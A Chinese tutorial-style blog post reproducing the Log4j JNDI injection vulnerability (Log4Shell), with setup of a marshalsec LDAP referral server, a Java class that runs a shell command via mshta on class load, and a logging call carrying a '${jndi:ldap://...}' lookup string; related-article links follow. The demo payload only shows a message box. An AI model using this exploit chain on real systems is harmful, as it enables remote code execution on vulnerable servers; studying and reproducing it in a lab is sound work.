log4j的1.14.1往下版本

需要先搭建一个LDAP服务器,git地址

git clone https://github.com/mbechler/marshalsec.git

执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令

"http://127.0.0.1/fileService/download/1/1/#test" 8888

意思是将文件服务器http://127.0.0.1/fileService/download/1/1/下面的test类,映射到8888端口

然后编写test类

public class test {static{try {Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4进来了\",64,\"来自熊猫头的消息\")(window.close)");} catch (IOException e) {e.printStackTrace();}}
}

test类执行了一个cmd指令,执行了一段vb程序语句

将他编译成class,放到文件服务器上,这里随便搭建什么文件服务器都行,给LDAP用。

我这边是用现有的外网远程服务器,http://127.0.0.1/fileService/download/1/1/

然后测试类

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;public class Main {private static final Logger log = LogManager.getLogger(Main.class);public static void main(String[] args) {String cmd = "${jndi:ldap://127.0.0.1:8888/test}";log.error(cmd);}
}

单你用log4j打印日志的时候,这日志写了几个jndi的命令,这就完蛋

log4j漏洞,jndi侵入验证复现相关推荐

  1. RMI、JNDI、LDAP介绍+log4j漏洞分析

    介绍 本篇主要介绍java的RMI.JNDI.LDAP,在后面会详细分析log4j的jndi注入原理. 什么是RMI RMI全称是Remote Method Invocatioon,也就是远程方法调用 ...

  2. log4j漏洞原理分析复现检测复盘

    凡事要自发,自然而为,即要顺从一切处于自然状态的事物,允许它们自发地转变.这样,道即达到了一种"无为而无不为"的状态.在日常生活中,道表现为"不自傲"或&quo ...

  3. 利用Vulhub复现log4j漏洞

    Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose bu ...

  4. 如何跟踪log4j漏洞原理及发现绕WAF的tips

    log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips 跟进漏洞产生原因的思路 如何发现漏洞产生原因的 了解到log4j ...

  5. 升级过log4j,却还没搞懂log4j漏洞的本质?

    摘要:log4j远程代码漏洞问题被大范围曝光后已经有一段时间了,今天完整讲清JNDI和RMI以及该漏洞的深层原因. 本文分享自华为云社区<升级过log4j,却还没搞懂log4j漏洞的本质?为你完 ...

  6. OpenShift Security (13) - 利用Log4j漏洞攻击容器

    <OpenShift 4.x HOL教程汇总> 演示视频 利用 Log4j 漏洞攻击容器需要有2个条件,1)Java应用中包含受到漏洞影响的Log4j.2)带有"JNDI 注入& ...

  7. 深入解析著名的阿里云Log4j 漏洞

    几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的. Apache Log4j2 是一个基于 ...

  8. 使用亚马逊云科技安全服务防御、检测和响应 Log4j 漏洞

    概述 在本文中,我们将为针对最近披露的 Log4j 漏洞所影响的客户提供一些指导意见.内容包括如何限制漏洞的风险,如何尝试识别是否易受此问题影响,以及如何使用适当的补丁更新基础架构. Log4j 漏洞 ...

  9. 深入分析Log4j 漏洞

    几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的. Apache Log4j2 是一个基于 ...

最新文章

  1. 如何用Python实现多任务版的udp聊天器
  2. Elasticsearch之倒排索引
  3. SDN你必须知道的十大问题——SDN有哪些开源项目
  4. Windows Azure Storage (19) 再谈Azure Block Blob和Page Blob
  5. [转载]Apache之Hadoop学习:初识hadoop
  6. Request/Response
  7. 判断字符串和数组是否为空
  8. 21个Docker 命令
  9. 高并发服务器开源项目,高并发服务器框架详解 - osc_qgfjs4a5的个人空间 - OSCHINA - 中文开源技术交流社区...
  10. IL -- 手动处理装箱Box
  11. EXCEL VBA编程入门三:VBA开发环境认识
  12. WIN7专业版32/64位更换系统语言注意
  13. C语言闰年还是平年问题程序,c语言判断一年是不是闰年,编程错在哪呢?
  14. 猿猿趴架构实战--03 什么是架构
  15. Kafka——Kafka的日志存储(5)
  16. 等比缩放公式_iPhone屏幕适配,等比缩放
  17. win7 eclipse调用虚拟机ubuntu部署的hadoop2.2.0伪分布(1)
  18. r语言软件GDINA_认知诊断分析系统(flexCDMs)设计及其实现
  19. 【运维面试】面试官:你觉得网站访问慢的原因有哪些?
  20. 图像的基本运算——scale, rotation, translation

热门文章

  1. 进度条制作-CSS动画
  2. JavaScript报错BigNumber overflow解决方法代码
  3. python练习 002 斜边上的高
  4. 2.2 拓扑空间与连续映射
  5. Linux应用编程概念
  6. 超级简单易懂的蓝桥杯《成绩统计》解法
  7. 怎样做小程序最省钱,小程序开发平台大盘点
  8. MVP框架——Android
  9. Discuz!开发之将论坛首页设置为某个版块页面的方法
  10. 离谱!以AI数据标注为名,偷拍女性上厕所?